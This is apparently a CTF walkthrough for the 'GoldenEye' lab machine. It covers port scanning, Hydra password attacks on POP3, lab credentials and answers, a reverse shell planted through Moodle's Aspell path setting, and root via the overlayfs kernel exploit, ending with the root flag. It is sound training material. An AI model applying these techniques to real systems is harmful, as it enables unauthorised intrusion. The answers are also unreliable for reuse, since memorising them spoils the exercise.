GoldenEye

Intro & Enumeration

Start Machine

This room will be a guided challenge to hack the James Bond styled box and get root.

Credit to creosote for creating this VM. This machine is used here with the explicit permission of the creator <3

So.. Lets get started!

Answer the questions below

First things first, connect to our network and deploy the machine.

Question Done

Use nmap to scan the network for all ports. How many ports are open?

4

Take a look on the website, take a dive into the source code too and remember to inspect all scripts!

Question Done

Who needs to make sure they update their default password?

Boris

Whats their password?

InvincibleHack3r

Now go use those credentials and login to a part of the site.

Question Done

Its mail time...

Onto the next steps..

Answer the questions below

Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable?

Question Done

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?

pop3

secret1!

Inspect port 55007, what services is configured to use this port?

telnet

Login using that service and the credentials you found earlier.

Question Done

What can you find on this service?

emails

What user can break Boris' codes?

natalya

Using the users you found on this service, find other users passwords

Question Done

Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

You will eventually get a xenia's password in plaintext.

Completed

GoldenEye Operators Training

Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.

Answer the questions below

If you remembered in some of the emails you discovered, there is the severnaya-station.com website. To get this working, you need up update your DNS records to reveal it.

If you're on Linux edit your "/etc/hosts" file and add:

If you're on Windows do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file

Completed

Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir

Completed

Try using the credentials you found earlier. Which user can you login as?

xenia

Have a poke around the site. What other user can you find?

doak

What was this users password?

pop3 + hydra

goat

Use this users credentials to go through all the services you have found to reveal more emails.

Completed

What is the next user you can find from doak?

Emails, emails, emails..

dr_doak

What is this users password?

4England!

Take a look at their files on the moodle (severnaya-station.com)

Completed

Download the attachments and see if there are any hidden messages inside them?

Use exiftool

Completed

Using the information you found in the last task, login with the newly found user.

Completed

As this user has more site privileges, you are able to edit the moodles settings. From here get a reverse shell using python and netcat.

Take a look into Aspell, the spell checker plugin.

Settings->Aspell->Path to aspell field, add your code to be executed. Then create a new page and "spell check it".

Completed

Privilege Escalation

Now that you have enumerated enough to get an administrative moodle login and gain a reverse shell, its time to priv esc.

Answer the questions below

Download the linuxprivchecker to enumerate installed development tools.

To get the file onto the machine, you will need to wget your local machine as the VM will not be able to wget files on the internet. Follow the steps to get a file onto your VM:

  • Download the linuxprivchecker file locally

  • Navigate to the file on your file system

  • Do: python -m SimpleHTTPServer 1337 (leave this running)

  • On the VM you can now do: wget /.py

OR

Enumerate the machine manually.

Completed

Whats the kernel version?

uname -a

3.13.0-32-generic

This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:

  • Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.

  • Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.

  • Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.

  • Make su on overlayfs world writable without changing the owner

  • Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.

  • Execute the modified su binary

You can download the exploit from here: https://www.exploit-db.com/exploits/37292

Completed

Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key!

What development tools are installed on the machine?

Its a VERY simple fix. You're only changing 1 character...

Completed

This is located in the root user folder.

What is the root flag?

568628e0d993b1973adc718237da6e93

[[Holo]]

PreviousBoiler CTFNextSplunk 3

Last updated

Was this helpful?